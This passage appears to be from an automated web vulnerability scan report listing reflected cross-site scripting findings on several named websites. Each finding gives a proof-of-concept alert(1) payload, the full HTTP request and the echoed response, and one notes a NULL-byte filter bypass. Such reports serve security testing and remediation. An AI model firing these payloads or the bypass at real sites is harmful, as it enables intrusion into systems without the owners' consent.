"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/skins/toucan6c090%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E927538bfc55?format=xar&amp;name=skins.toucan6c090"><img src=a onerror=alert(1)>927538bfc55&amp;pages=skins.toucan6c090">
...[SNIP]...

4.560. http://www.nuxeo.org/xwiki/bin/view/skins/toucan [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/skins/toucan

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e9b27<img%20src%3da%20onerror%3dalert(1)>b14aaf13493 was submitted in the REST URL parameter 5. This input was echoed as e9b27<img src=a onerror=alert(1)>b14aaf13493 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/skins/toucane9b27<img%20src%3da%20onerror%3dalert(1)>b14aaf13493 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:43 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12859
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/skins/toucane9b27%3Cimg+src%3Da+onerror%3Dalert%281%29%3Eb14aaf13493'>toucane9b27<img src=a onerror=alert(1)>b14aaf13493</a>
...[SNIP]...

4.561. http://www.pcworld.com/article/186782/google_docs_not_the_only_free_cloud_storage_in_the_sky.html/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /article/186782/google_docs_not_the_only_free_cloud_storage_in_the_sky.html/x22

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d302'-alert(1)-'5100b7f3ca3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article/186782/google_docs_not_the_only_free_cloud_storage_in_the_sky.html7d302'-alert(1)-'5100b7f3ca3/x22 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8FD19D83EC22BF3B0497BD7190240199; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 10:48:14 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
n.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/article/186782/google_docs_not_the_only_free_cloud_storage_in_the_sky.html7d302'-alert(1)-'5100b7f3ca3/x22';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_u
...[SNIP]...

4.562. http://www.pcworld.com/article/186782/google_docs_not_the_only_free_cloud_storage_in_the_sky.html/x22 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /article/186782/google_docs_not_the_only_free_cloud_storage_in_the_sky.html/x22

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7372'-alert(1)-'5c372971717 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /article/186782/google_docs_not_the_only_free_cloud_storage_in_the_sky.html/x22f7372'-alert(1)-'5c372971717 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3866F9D3FADDA5E3B41EC99B9D4ED0A5; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 10:48:16 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
Valid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/article/186782/google_docs_not_the_only_free_cloud_storage_in_the_sky.html/x22f7372'-alert(1)-'5c372971717';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

4.563. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html/x26amp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc6c4'-alert(1)-'7683537c603 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/fc6c4'-alert(1)-'7683537c603/today_pcworld.html/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dD9bgTLzBDIT7lwedwo2YAw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQ6QUoAQ\\x26amp;q\\x3dcloud+storage\\x26amp;usg\\x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w\\x22\\x3eToday HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C206F4C694BF294F838F4AA08DAE34EC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 10:48:13 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/fc6c4'-alert(1)-'7683537c603/today_pcworld.html/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dD9bgTLzBDIT7lwedwo2YAw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQ6QUoAQ\\x26amp;q\\x3dcloud+storage\\x26amp;usg\\x3dAFQjCNEwg3dcTslMU6J
...[SNIP]...

4.564. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html/x26amp

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 103d6'-alert(1)-'a4dd3b030dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,56/today_pcworld.html103d6'-alert(1)-'a4dd3b030dc/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dD9bgTLzBDIT7lwedwo2YAw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQ6QUoAQ\\x26amp;q\\x3dcloud+storage\\x26amp;usg\\x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w\\x22\\x3eToday HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=26E64102C32F90C6C6F0B6B60A5061B5; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 10:48:15 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
rEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,56/today_pcworld.html103d6'-alert(1)-'a4dd3b030dc/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dD9bgTLzBDIT7lwedwo2YAw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQ6QUoAQ\\x26amp;q\\x3dcloud+storage\\x26amp;usg\\x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w\\x2
...[SNIP]...

4.565. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html/x26amp

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1567c'-alert(1)-'db95f55458e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dD9bgTLzBDIT7lwedwo2YAw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQ6QUoAQ\\x26amp;q\\x3dcloud+storage\\x26amp;usg\\x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w\\x22\\x3eToday HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=067FCDCBD9D4A18CF81EDBE4A8EE083D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 10:48:17 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
= pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,56/today_pcworld.html/x26amp1567c'-alert(1)-'db95f55458e;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dD9bgTLzBDIT7lwedwo2YAw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQ6QUoAQ\\x26amp;q\\x3dcloud+storage\\x26amp;usg\\x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w\\x22\\x3eT
...[SNIP]...

4.566. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c0d3'-alert(1)-'6eddebac90a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,56/today_pcworld.html/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dD9bgTLzBDIT7lwedwo2YAw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQ6QUoAQ\\x26amp;q\\x3dcloud+storage\\x26amp;usg\\x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w\\x22\\x3eToday&5c0d3'-alert(1)-'6eddebac90a=1 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=39CFEAC4D830CB9CEA609ADC54DBAD6B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 10:48:11 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dD9bgTLzBDIT7lwedwo2YAw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQ6QUoAQ\\x26amp;q\\x3dcloud+storage\\x26amp;usg\\x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w\\x22\\x3eToday&5c0d3'-alert(1)-'6eddebac90a=1';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri
...[SNIP]...

4.567. http://www.pcworld.com/blogs/id,56/today_pcworld.html/x26amp [rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dD9bgTLzBDIT7lwedwo2YAw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQ6QUoAQ\\x26amp;q\\x3dcloud+storage\\x26amp;usg\\x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w\\x22\\x3eToday parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,56/today_pcworld.html/x26amp

Issue detail

The value of the rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dD9bgTLzBDIT7lwedwo2YAw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQ6QUoAQ\\x26amp;q\\x3dcloud+storage\\x26amp;usg\\x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w\\x22\\x3eToday request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38eae'-alert(1)-'a9380993a88 was submitted in the rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dD9bgTLzBDIT7lwedwo2YAw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQ6QUoAQ\\x26amp;q\\x3dcloud+storage\\x26amp;usg\\x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w\\x22\\x3eToday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,56/today_pcworld.html/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dD9bgTLzBDIT7lwedwo2YAw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQ6QUoAQ\\x26amp;q\\x3dcloud+storage\\x26amp;usg\\x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w\\x22\\x3eToday38eae'-alert(1)-'a9380993a88 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6CB510E19FF1287B92C8876ACDD53311; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 10:48:07 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dD9bgTLzBDIT7lwedwo2YAw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CHYQ6QUoAQ\\x26amp;q\\x3dcloud+storage\\x26amp;usg\\x3dAFQjCNEwg3dcTslMU6JvQiRNghwCzRe32w\\x22\\x3eToday38eae'-alert(1)-'a9380993a88';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

4.568. http://www.rackspacecloud.com/what_is_cloud_computing/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rackspacecloud.com
Path:   /what_is_cloud_computing/x22

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd974"-alert(1)-"4dc917e8625 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /what_is_cloud_computingdd974"-alert(1)-"4dc917e8625/x22 HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Mosso Engineering)
Content-Type: text/html; charset=utf-8
Date: Mon, 15 Nov 2010 10:47:59 GMT
Status: 404 Not Found
Keep-Alive: timeout=15, max=66
Connection: close
Set-Cookie: symfony=76l3d7r2t00dcijgl5hj6fdhu0; path=/
X-Powered-By: PHP/5.2.6
Content-Length: 18883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" id="windows">
<head>
<meta
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="/what_is_cloud_computingdd974"-alert(1)-"4dc917e8625/x22";
s.server=""
s.channel=""
s.pageType=""
s.prop1=""
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
s.prop6="US76l3d7r2t00dcijgl5hj6fdhu0";
s.prop8=s.pageName + ":" + s.getQueryParam('utm_campaign,cmp
...[SNIP]...

4.569. http://www.rackspacecloud.com/what_is_cloud_computing/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rackspacecloud.com
Path:   /what_is_cloud_computing/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe707"-alert(1)-"3331a555153 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /what_is_cloud_computing/x22fe707"-alert(1)-"3331a555153 HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Mosso Engineering)
Content-Type: text/html; charset=utf-8
Date: Mon, 15 Nov 2010 10:48:00 GMT
Status: 404 Not Found
Keep-Alive: timeout=15, max=150
Connection: close
Set-Cookie: symfony=7fnn81ltl33rtg7vf39en93mr7; path=/
X-Powered-By: PHP/5.2.6
Content-Length: 18883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" id="windows">
<head>
<meta
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="/what_is_cloud_computing/x22fe707"-alert(1)-"3331a555153";
s.server=""
s.channel=""
s.pageType=""
s.prop1=""
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
s.prop6="US7fnn81ltl33rtg7vf39en93mr7";
s.prop8=s.pageName + ":" + s.getQueryParam('utm_campaign,cmp',':
...[SNIP]...

4.570. http://www.rackspacecloud.com/what_is_cloud_computing/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rackspacecloud.com
Path:   /what_is_cloud_computing/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0467"-alert(1)-"703d8e2db5d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /what_is_cloud_computing/x22?e0467"-alert(1)-"703d8e2db5d=1 HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Mosso Engineering)
Content-Type: text/html; charset=utf-8
Date: Mon, 15 Nov 2010 10:47:58 GMT
Status: 404 Not Found
Keep-Alive: timeout=15, max=71
Connection: close
Set-Cookie: symfony=khjn71ldod8a4nb46tbr2l9bb5; path=/
X-Powered-By: PHP/5.2.6
Content-Length: 18886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" id="windows">
<head>
<meta
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="/what_is_cloud_computing/x22?e0467"-alert(1)-"703d8e2db5d=1";
s.server=""
s.channel=""
s.pageType=""
s.prop1=""
s.prop2=""
s.prop3=""
s.prop4=""
s.prop5=""
s.prop6="USkhjn71ldod8a4nb46tbr2l9bb5";
s.prop8=s.pageName + ":" + s.getQueryParam('utm_campaign,cmp',
...[SNIP]...

4.571. http://www.videobox.com/beta/2257.seam [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/2257.seam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 711da<script>alert(1)</script>d4e86d8909f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beta711da<script>alert(1)</script>d4e86d8909f/2257.seam HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0176481C872BB3F105D47E53A4B62BBB; __utmv=; use_yf=false; __utmz=179270819.1289829501.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; state=1-1289829533228-0-4133; ref=687474703a2f2f7366776b2e6f72672f436f6d6d756e6974792f5365616d496e50726f64756374696f6e; tc=H4sIAAAAAAAAAKWPzW6DMBCEz8lTWHsvGNsQU+G8CuJnQywZTO0lNG9fR1FP6SFSTyvNzDeabWhg02bH1mEX0cBHVelaclXKujopKbTWHJ6J2Ud6BEQhZXWqlNKiKDnnUgEbAnaEo4FC6FqLupRSiBOw1SbNLoRh6Rywiw2R2i04A1ei9TPP933PbnZE3/vvbPBz3iN1eR/8HjGL2M2/0NeG4W5g2VzqsbF9qlebJl06FxHYDYMBke64GABGyeFwPh4ODQ3tmGqtY3Rf05NFcu2ML2tTrfPT9PiDwoaQ/0mrF1qVvHyXlv+ixfvLm5yG8/EHKBR/jeABAAA-; WRUID=0; partner=internal; __utma=179270819.596561490.1289829501.1289829501.1289829501.1; __utmc=179270819; __utmb=179270819.1.10.1289829501; use_gf=false;

Response

HTTP/1.0 404 Not Found
Server: BigIP
Connection: close
Content-Length: 362

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <code>/beta711da<script>alert(1)</script>d4e86d8909f/2257.seam</code>
...[SNIP]...

4.572. http://www.videobox.com/beta/2257.seam [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videobox.com
Path:   /beta/2257.seam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %0025f5e<script>alert(1)</script>cfd603108de was submitted in the REST URL parameter 2. This input was echoed as 25f5e<script>alert(1)</script>cfd603108de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /beta/2257.seam%0025f5e<script>alert(1)</script>cfd603108de HTTP/1.1
Host: www.videobox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
